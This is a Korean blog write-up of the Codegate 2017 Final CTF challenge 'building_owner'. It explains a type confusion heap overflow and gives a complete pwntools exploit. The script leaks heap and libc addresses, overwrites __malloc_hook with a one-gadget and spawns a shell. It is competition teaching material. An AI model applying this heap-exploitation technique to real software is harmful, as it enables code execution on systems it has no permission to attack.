-
Codegate 2017 Final building_ownerPwnable/CTF 2018. 1. 21. 20:12
이 문제에서는 type confusion취약점이 있는데 manage함수 부분을보면 edit, change둘중 change부분을 보면 원래 company type라면 저 함수를 써서 restaurant type로 바꾼다면 두 type끼리 size가 안 맞아서 오버플로우가 되는것을 이용하여서 name 포인터 부분으로 heap 릭을하고 main_arena leak + 공격을 할수있다.
string 객체는 "A"*17 을 넣으면 0x21사이즈로 할당이되고 25개를 넣으면 0x21사이즈를 free하고 0x31사이즈로 할당을 하는 특징을 이용하여서 main arena 릭을 할수있다.123456789101112131415161718192021222324252627apart {string name 0int64_t floor 32string about 40int64_t house 72}company {string name 0int64_t floor 32string about 40uint64_t people 72uint64_t money 80}restaurant {string name 0int64_t floor 32string about 40int64_t people 72int64_t money 80int64_t menu 88int64_t price 96int64_t pay 104}cs 구조체는 위와같다.1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889909192939495969798from pwn import *p=process("./building_owner")elf=ELF("./building_owner")def apartment(name,floor,house,about):p.sendlineafter('> ','1')p.sendlineafter('?',name)p.sendlineafter('? ',str(floor))p.sendlineafter('? ',str(house))p.sendlineafter(': ',about)def company(name,floor,people,money,about):p.sendlineafter('> ','2')p.sendlineafter('?',name)p.sendlineafter('? ',str(floor))p.sendlineafter('? ',str(people))p.sendlineafter('? ',str(money))p.sendlineafter(': ',about)def restaurant(name,floor,menu,people,money,price,pay,about):p.sendlineafter('> ','3')p.sendlineafter('?',name)p.sendlineafter('? ',str(floor))p.sendlineafter('? ',str(menu))p.sendlineafter('? ',str(people))p.sendlineafter('? ',str(money))p.sendlineafter('? ',str(price))p.sendlineafter('?',str(pay))p.sendlineafter(': ',about)def manage():p.sendlineafter('> ','4')def edit_start(type_,idx):p.sendlineafter('> ','1')p.sendlineafter('> ',str(type_))p.sendlineafter('> ',str(idx))def change(type_,idx,kind):p.sendlineafter('> ','2')p.sendlineafter('> ',str(type_))p.sendlineafter('> ',str(idx))p.sendlineafter('> ',str(kind))p.sendlineafter('> ','5')def exit():p.sendlineafter('> ','3')apartment("AAAA",10,10,"AAAA")company("B"*9,20,20,20,"BBBB") #"B"*9 len == 9 -> main_arena 8byte leakrestaurant("CCCC",30,30,30,30,30,30,"CCCC")manage()change(1,1,2) #apart idx 1 -> restaurantedit_start(3,2)p.recvuntil('price of menu : ')heap = int(p.recvuntil('\n').split('\n')[0],10) #company nameprint hex(heap)p.sendlineafter('> ','10') #restaurant edit exitp.sendlineafter('> ','4') #edit exitexit()leak_target = heap + 0x1b0 #main_arena + 88print hex(leak_target)company("b"*150,20,20,20,"bbbb") #leak heapmanage()edit_start(3,2)p.sendlineafter('> ','6') #menu edit -> company name ptr editp.sendlineafter(': ',str(leak_target))p.sendlineafter('> ','10') #restaurant edit exitp.sendlineafter('> ','2')p.recvuntil('1. ')main_arena = u64(p.recv(8)) - 88malloc_hook = main_arena - 0x10libc_base = malloc_hook - 0x3c4b10one_shot = libc_base + 0xf1147print hex(main_arena)print hex(malloc_hook)p.sendlineafter('> ','3') #company edit exitp.sendlineafter('> ','3') #restaurant edit startp.sendlineafter('> ','2') #type change idx -> 2p.sendlineafter('> ','6') #company name ptr editp.sendlineafter(': ',str(malloc_hook))p.sendlineafter('> ','10')p.sendlineafter('> ','2')p.sendlineafter('> ','1') #target malloc_hookp.sendlineafter('> ','1') #company name changep.sendlineafter(': ',p64(one_shot)) #malloc_hook editp.sendlineafter('> ','6')p.sendlineafter('> ','4')exit()p.sendlineafter('> ','1') #apart malloc_hook -> oneshotp.interactive()cs 'Pwnable > CTF' 카테고리의 다른 글
defcon 2016 pillpusher (1) 2018.01.24 insomnihack CTF 2018 sapeloshop (0) 2018.01.23 Christmas CTF 2017 BitcoinGallery (0) 2018.01.18 Codeblue 2017 simple memo pad (0) 2018.01.17 Codegate 2017 hunting (0) 2018.01.17